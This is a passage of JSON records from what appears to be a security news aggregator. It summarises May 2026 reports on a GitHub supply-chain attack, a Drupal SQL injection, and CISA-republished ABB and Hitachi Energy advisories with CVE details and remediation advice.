Hours","5-561-github-repositories-hit-by-megalodon-supply-chain-attack-in-six-hours-ae8ebc","https:\u002F\u002Fhackread.com\u002Fgithub-repositories-megalodon-supply-chain-attack\u002F","SafeDep uncovered the Megalodon attack targeting 5,561 GitHub repositories with malicious CI workflows and cloud credential theft.","SafeDep discovered Megalodon, a large-scale automated supply chain attack targeting 5,561 GitHub repositories that pushed 5,718 malicious code updates within six hours on May 18, 2026. The attackers used fake GitHub accounts and injected malicious CI\u002FCD workflows to steal cloud credentials and GitHub Actions tokens, enabling credential theft from AWS, Google Cloud, and Azure. The attack resulted in seven poisoned versions of the Tiledesk npm package being published publicly, demonstrating the downstream impact of compromised repositories.","https:\u002F\u002Fhackread.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002Fgithub-repositories-megalodon-supply-chain-attack.png","2026-05-22T13:51:21+00:00","2026-05-22T14:00:22.491648+00:00",{"id":272,"url":273,"name":274},{"id":18,"icon":9,"name":19,"slug":20,"description":21},[344,345,346],{"id":77,"slug":79,"name":78},{"id":173,"slug":175,"name":174},{"id":183,"slug":185,"name":184},{"id":348,"title":349,"slug":350,"url":351,"summary":352,"ai_summary":353,"parent_article_id":9,"relation_type":9,"image_url":354,"verify_count":202,"avg_score":9,"score_count":202,"published_at":355,"ingested_at":356,"source":357,"category":361,"tags":362,"ioc_count":214,"has_awareness_lesson":215,"awareness_lesson_id":9},"952dc02f-8cbd-4716-8491-4bd972a74c12","Drupal: Critical SQL injection flaw now targeted in attacks","drupal-critical-sql-injection-flaw-now-targeted-in-attacks-4ce8ff","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fdrupal-critical-sql-injection-flaw-now-targeted-in-attacks\u002F","Drupal is warning that hackers are attempting to exploit a \"highly critical\" SQL injection vulnerability announced earlier this week. [...]","Drupal has confirmed active exploitation of CVE-2026-9082, a critical SQL injection vulnerability in its database abstraction API affecting PostgreSQL installations. The flaw, discovered by Google\u002FMandiant researcher Michael Maturi, allows unauthenticated attackers to execute arbitrary SQL commands, potentially leading to remote code execution and data breach. Drupal has released patches for versions 10.4.x through 11.3.x and urges immediate upgrades.","https:\u002F\u002Fwww.bleepstatic.com\u002Fcontent\u002Fhl-images\u002F2026\u002F05\u002F22\u002Fdrupal.jpg","2026-05-22T13:14:40+00:00","2026-05-22T14:00:25.218292+00:00",{"id":358,"url":359,"name":360},"0a97efc1-021e-4aee-ae8f-b1643b35de46","https:\u002F\u002Fwww.bleepingcomputer.com\u002Ffeed\u002F","BleepingComputer",{"id":6,"icon":9,"name":7,"slug":8,"description":9},[363],{"id":12,"slug":14,"name":13},{"id":365,"title":366,"slug":367,"url":368,"summary":369,"ai_summary":370,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":371,"ingested_at":372,"source":373,"category":374,"tags":375,"ioc_count":202,"has_awareness_lesson":378,"awareness_lesson_id":379},"11693fbc-af4a-45ff-951d-6911116ee995","macOS Kernel Memory Corruption Exploit - Schneier on Security","macos-kernel-memory-corruption-exploit-schneier-on-security-b53cb4","https:\u002F\u002Fwww.schneier.com\u002Fblog\u002Farchives\u002F2026\u002F05\u002Fmacos-kernel-memory-corruption-exploit.html","A group used Anthropic’s Mythos AI model to help find a kernel memory corruption vulnerability and exploit on Apple’s M5. News article.","A research group leveraged Anthropic's Mythos AI model to identify and develop an exploit for a kernel memory corruption vulnerability affecting Apple's M5 chip architecture. The incident highlights the dual-use nature of AI-assisted security research, where advanced language models can accelerate both defensive and offensive vulnerability discovery. This marks a notable shift in how emerging AI capabilities are being applied to low-level system exploitation.","2026-05-21T16:03:37+00:00","2026-05-21T17:00:07.582+00:00",{"id":206,"url":207,"name":208},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[376,377],{"id":12,"slug":14,"name":13},{"id":178,"slug":180,"name":179},true,"0751b06e-a3a8-4e4b-886f-ce9cd6c78655",{"id":381,"title":382,"slug":383,"url":384,"summary":385,"ai_summary":386,"parent_article_id":9,"relation_type":9,"image_url":387,"verify_count":202,"avg_score":9,"score_count":202,"published_at":388,"ingested_at":389,"source":390,"category":391,"tags":392,"ioc_count":202,"has_awareness_lesson":378,"awareness_lesson_id":396},"cd92bee5-6752-4fad-8cf8-bc25ee36a6fb","Deleted Google API Keys Remain Active up to 23 Minutes, Study Finds","deleted-google-api-keys-remain-active-up-to-23-minutes-study-finds-3f9c32","https:\u002F\u002Fhackread.com\u002Fdeleted-google-api-keys-active-23-minutes\u002F","Deleted Google API Keys remain active for up to 23 minutes after deletion, exposing GCP, Gemini, BigQuery, and Maps data to attackers.","Aikido Security's research reveals that deleted Google API keys continue to authenticate successfully for an average of 16 minutes, with delays reaching up to 23 minutes. The delay stems from eventual consistency in Google's distributed authentication infrastructure, allowing attackers with leaked keys to access GCP, Gemini, BigQuery, and Maps APIs during the propagation window. Google closed the security report as \"won't fix,\" treating the delay as a known system property rather than a vulnerability.","https:\u002F\u002Fhackread.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002Fdeleted-google-api-keys-active-23-minutes.png","2026-05-21T16:03:12+00:00","2026-05-21T18:00:27.692374+00:00",{"id":272,"url":273,"name":274},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[393,394,395],{"id":36,"slug":38,"name":37},{"id":173,"slug":175,"name":174},{"id":183,"slug":185,"name":184},"2097d346-1c46-4ce3-bbaa-d53481570325",{"id":398,"title":399,"slug":400,"url":401,"summary":402,"ai_summary":403,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":404,"ingested_at":405,"source":406,"category":410,"tags":411,"ioc_count":280,"has_awareness_lesson":378,"awareness_lesson_id":413},"ebca1b63-bce5-4bbe-afc6-b4155c8495f6","ABB B&R Automation Runtime","abb-b-r-automation-runtime-bc2b5c","https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fics-advisories\u002Ficsa-26-141-04","View CSAF Summary An update is available that resolves a vulnerability identified by B&Rs internal security analysis in the product versions listed as affected in this advisory. An attacker who successfully exploited these vulnerabilities could take over a remote session or execute code in the context of the user’s browser session. The following versions of ABB B&R Automation Runtime are affected: Automation Runtime \u003C6.4, 6.4 (CVE-2025-3449, CVE-2025-3448, CVE-2025-11498) CVSS Vendor Equipment Vulnerabilities v3 6.1 B&R ABB B&R Automation Runtime Generation of Predictable Numbers or Identifiers, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Neutralization of Formula Elements in a CSV File Background Critical Infrastructure Sectors: Energy Countries\u002FAreas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-3449 A Generation of Predictable Numbers or Identifiers vulnerability in the SDM component of B&R Automation Runtime versions before 6.4 may allow an unauthenticated network-based attacker to take over already established sessions. View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime \u003C6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Relevant CWE: CWE-340 Generation of Predictable Numbers or Identifiers Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.2 MEDIUM CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:N\u002FUI:R\u002FS:U\u002FC:L\u002FI:L\u002FA:N\u002FE:F\u002FRL:O\u002FRC:C CVE-2025-3448 Reflected cross-site scripting (XSS) vulnerabilities exist in System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.4 that enables a remote attacker to execute arbitrary JavaScript code in the context of the attacked user’s browser session View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime \u003C6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N\u002FE:F\u002FRC:C CVE-2025-11498 An Improper Neutralization of Formula Elements in a CSV File vulnerability exists in System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.4 enabling a remote attacker to inject formula data into a generated CSV file. The exploitation of this vulnerability requires the attack-er to create a malicious link. The user would need to click on this link, after which the resulting CSV file additionally needs to be manually opened. View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime \u003C6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Relevant CWE: CWE-1236 Improper Neutralization of Formula Elements in a CSV File Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N\u002FRL:O\u002FRC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Mitigating factors Do not enable the System Diagnostics Manager when it is not required. Refer to section “General security recommendations” for further advise on how to keep your system secure. Workarounds Do not use Hyperlinks provided by untrusted 3rd party to access the SDM. Hyperlinks may be provided via: • Emails from unknown users • Social media channels • Messaging services • Webpages with comment functionality • QR Codes The use of external Web Application Firewalls (WAF) can mitigate attacks using reflected cross-site scripting. Frequently asked questions What causes the vulnerabilities? The vulnerabilities are caused by insufficient input sanitization and generation of predictable numbers. What is System Diagnostics Manager (SDM)? System Diagnostics Manager (SDM) is a webpage available over the Automation Runtime Webserver, showing key diagnostic information of the running controller. What is Automation Runtime (AR)? B&R Automation Runtime is a middleware system enabling customers to run applications on B&R target systems. What might an attacker use the vulnerabilities to do? An attacker who successfully exploited these vulnerabilities could cause to run arbitrary code in the context of the user’s browser session or take over the user’s session. Since the SDM currently does not process any session-specific data and also does not implement authentication mechanisms at the session level, B&R is not aware of any advantages an attacker could gain by taking over the session ID How could an attacker exploit the vulnerabilities? To exploit the XSS vulnerability CVE-2025-3448, an attacker could try to create a hyperlink including malicious script code. This hyperlink must be opened by the user to launch the attack. To exploit vulnerability CVE-2025-3449, an attacker would need to guess a user's session ID. Could the vulnerabilities be exploited remotely? Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. When this security advisory was issued, had this vulnerability been publicly disclosed? No, B&R discovered the vulnerabilities through its own security analysis. When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited? No, B&R had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https:\u002F\u002Fwww.cisa.gov\u002Fnotification) and this Privacy & Use policy (https:\u002F\u002Fwww.cisa.gov\u002Fprivacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and\u002For systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA25P003 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided \"as-is\" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2025-10-07 Date Revision Summary 2025-10-07 1 Initial version. 2025-10-14 2 Added information about CVE-2025-11498 2026-05-21 3 Initial CISA Republication of ABB PSIRT SA25P003 advisory Legal Notice and Terms of Use","ABB B&R disclosed three vulnerabilities (CVE-2025-3449, CVE-2025-3448, CVE-2025-11498) in Automation Runtime versions before 6.4 affecting the System Diagnostics Manager (SDM) component. The flaws enable unauthenticated attackers to hijack sessions via predictable identifiers, execute arbitrary JavaScript via reflected XSS, and inject malicious formulas into CSV files. Fix is available in Automation Runtime 6.4; SDM is disabled by default and primarily impacts systems where it is explicitly enabled.","2026-05-21T12:00:00+00:00","2026-05-21T18:00:26.736311+00:00",{"id":407,"url":408,"name":409},"6e0140fd-86c4-4e73-9d3a-a44eb754dc6b","https:\u002F\u002Fwww.cisa.gov\u002Fcybersecurity-advisories\u002Fall.xml","CISA Alerts",{"id":6,"icon":9,"name":7,"slug":8,"description":9},[412],{"id":42,"slug":44,"name":43},"77a8e7c2-c798-43a8-8c4c-73d1b28d655e",{"id":415,"title":416,"slug":417,"url":418,"summary":419,"ai_summary":420,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":404,"ingested_at":405,"source":421,"category":422,"tags":423,"ioc_count":280,"has_awareness_lesson":378,"awareness_lesson_id":425},"1fac00c0-edc1-4e72-9c90-6a663ffd88b4","ABB Terra AC Wallbox","abb-terra-ac-wallbox-f3cf9d","https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fics-advisories\u002Ficsa-26-141-05","View CSAF Summary ABB is aware of vulnerabilities in the product versions listed as affected in the advisory. An attacker who successfully exploited this vulnerability could cause the pollution of heap memory which potentially takes remote control of the product and performs a write operation to the flash memory to alter the firmware behavior. The following versions of ABB Terra AC Wallbox are affected: Terra AC wallbox (JP) \u003C=1.8.33, 1.8.36 (CVE-2025-10504, CVE-2025-12142, CVE-2025-12143) CVSS Vendor Equipment Vulnerabilities v3 6.1 ABB ABB Terra AC Wallbox Heap-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Stack-based Buffer Overflow Background Critical Infrastructure Sectors: Energy Countries\u002FAreas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-10504 There is potential risk to pollute the memory when developing apps which has used to communicate with charger according to self-defined protocol if developers don’t strictly follow the field length which has not been validated in firmware. View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) \u003C=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at earliest convenience. Mitigation To attack with this kind of message, hackers must hijack Bluetooth first and then can send messages. Because the communication messages between BLE and charger have been encrypted. In theory, there is no way to attack the charger. Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:A\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H\u002FE:P\u002FRL:O\u002FRC:C CVE-2025-12142 There is potential risk of polluting the BSS memory when developing apps which are used to communicate with charger via Bluetooth according to self-defined protocol if developers configure an unexpected length of bin files. View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) \u003C=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at earliest convenience. Mitigation To attack with this kind of message, hackers must hijack Bluetooth first and then can send messages. Because the communication messages between BLE and charger have been encrypted. In theory, there is no way to attack the charger. Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:A\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H\u002FE:P\u002FRL:O\u002FRC:C CVE-2025-12143 There is potential risk of polluting the stack memory when developing a customized OCPP key of “Ran-domDelay“ in backend and configuring an unexpected number in the field. View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) \u003C=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at earliest convenience. Mitigation To attack with this kind of message, hackers must hijack Bluetooth first and then can send messages. Because the communication messages between BLE and charger have been encrypted. In theory, there is no way to attack the charger. Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:A\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H\u002FE:P\u002FRL:O\u002FRC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Legal Notice and Terms of Use This product is provided subject to this Notification (https:\u002F\u002Fwww.cisa.gov\u002Fnotification) and this Privacy & Use policy (https:\u002F\u002Fwww.cisa.gov\u002Fprivacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and\u002For systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 9AKK108471A8107 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided \"as-is\" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2025-09-16 Date Revision Summary 2025-09-16 1 Initial version. 2025-09-28 2 DocumentID update 2025-09-28 3 Minor corrections 2025-10-09 4 CVSS update 2025-10-27 5 CVE update 2025-11-28 6 CVE update 2025-11-28 7 Fixed Version update 2026-05-21 8 Initial CISA Republication of ABB PSIRT 9AKK108471A8107 advisory Legal Notice and Terms of Use","ABB disclosed three memory corruption vulnerabilities (CVE-2025-10504, CVE-2025-12142, CVE-2025-12143) in Terra AC Wallbox EV chargers deployed worldwide, affecting versions ≤1.8.33. The vulnerabilities allow heap, BSS, and stack memory pollution via malformed Bluetooth protocol messages, potentially enabling remote firmware alteration. ABB has released a fix in version 1.8.36; exploitation requires prior Bluetooth hijacking due to encrypted BLE communication.",{"id":407,"url":408,"name":409},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[424],{"id":42,"slug":44,"name":43},"850388e7-0c81-4fe1-8cf9-861a3c7aebda",{"id":427,"title":428,"slug":429,"url":430,"summary":431,"ai_summary":432,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":404,"ingested_at":405,"source":433,"category":434,"tags":435,"ioc_count":214,"has_awareness_lesson":378,"awareness_lesson_id":439},"e3a6e55a-7d15-4999-9554-0ccce67f8b71","Hitachi Energy GMS600","hitachi-energy-gms600-6701cd","https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fics-advisories\u002Ficsa-26-141-01","View CSAF Summary Hitachi Energy is aware of the vulnerability, CVE-2022-4304 in the OSS component OpenSSL, that affects the GMS600 versions that are listed below. An attacker successfully exploiting this vulnerability could send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection. For immediate mitigation \u002Fworkaround information, please refer to the General Mitigation Factors\u002FWorkarounds The following versions of Hitachi Energy GMS600 are affected: GMS600 vers:GMS600\u002F>=1.3.0|\u003C=1.3.1 (CVE-2022-4304) CVSS Vendor Equipment Vulnerabilities v3 5.9 Hitachi Energy Hitachi Energy GMS600 Observable Discrepancy Background Critical Infrastructure Sectors: Critical Manufacturing Countries\u002FAreas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2022-4304 A timing-based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection. View CVE Details Affected Products Hitachi Energy GMS600 Vendor: Hitachi Energy Product Version: GMS600 versions 1.3.0 and 1.3.1 Product Status: known_affected Remediations Vendor fix Upgrade to version 1.3.2 Relevant CWE: CWE-203 Observable Discrepancy Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N Acknowledgments Hitachi Energy Internal Team reported this vulnerability to CISA Notice The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Support For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https:\u002F\u002Fwww.hitachienergy.com\u002Fcontact-us\u002F for Hitachi Energy contact-centers. General Mitigation Factors Recommended security practices and firewall configurations such as enforcing ingress IP allowlisting and applying traffic rate limiting in accordance with the operational security policy can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. SSVC SSVCv2\u002FE:N\u002FA:Y\u002F2026-04-22T13:37:14Z\u002F Legal Notice and Terms of Use This product is provided subject to this Notification (https:\u002F\u002Fwww.cisa.gov\u002Fnotification) and this Privacy & Use policy (https:\u002F\u002Fwww.cisa.gov\u002Fprivacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and\u002For systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Hitachi Energy PSIRT 8DBD000159 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided \"as-is\" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2023-06-27 Date Revision Summary 2023-06-27 1 Initial public release. 2026-04-28 2 Updated fixed version. 2026-05-21 3 Initial CISA Republication of Hitachi Energy PSIRT 8DBD000159 advisory Legal Notice and Terms of Use","Hitachi Energy GMS600 grid management system versions 1.3.0 and 1.3.1 are affected by CVE-2022-4304, a timing-based side-channel vulnerability in OpenSSL's RSA decryption implementation. An attacker with network access can recover encrypted pre-master secrets and decrypt TLS application data through a Bleichenbacher-style attack. Hitachi recommends immediate upgrade to version 1.3.2.",{"id":407,"url":408,"name":409},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[436,437,438],{"id":48,"slug":50,"name":49},{"id":18,"slug":20,"name":19},{"id":42,"slug":44,"name":43},"244af732-7dcc-4cf2-81e2-be1f776f9be3",{"id":441,"title":442,"slug":443,"url":444,"summary":445,"ai_summary":446,"parent_article_id":9,"relation_type":9,"image_url":447,"verify_count":202,"avg_score":9,"score_count":202,"published_at":448,"ingested_at":449,"source":450,"category":454,"tags":455,"ioc_count":280,"has_awareness_lesson":378,"awareness_lesson_id":459},"19308891-aad0-4dd8-b813-d04ede57526f","Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days","microsoft-patches-exploited-undefend-and-redsun-defender-zero-days-abf255","https:\u002F\u002Fwww.securityweek.com\u002Fmicrosoft-patches-exploited-undefend-and-redsun-defender-zero-days\u002F","The bugs could be exploited to elevate privileges to System or create a denial-of-service (DoS) condition. The post Microsoft Patches Exploited UnDefend and RedSun Defender Zero-Days appeared first on SecurityWeek.","Microsoft released security patches for two zero-day vulnerabilities in Microsoft Defender that have been actively exploited in the wild. CVE-2026-41091 (CVSS 7.8) allows privilege escalation to System via link-following, while CVE-2026-45498 (CVSS 4.0) causes denial-of-service; both are variants of the BlueHammer exploit publicly disclosed last month. CISA added these flaws to its Known Exploited Vulnerabilities list and mandated federal agencies patch by June 3, 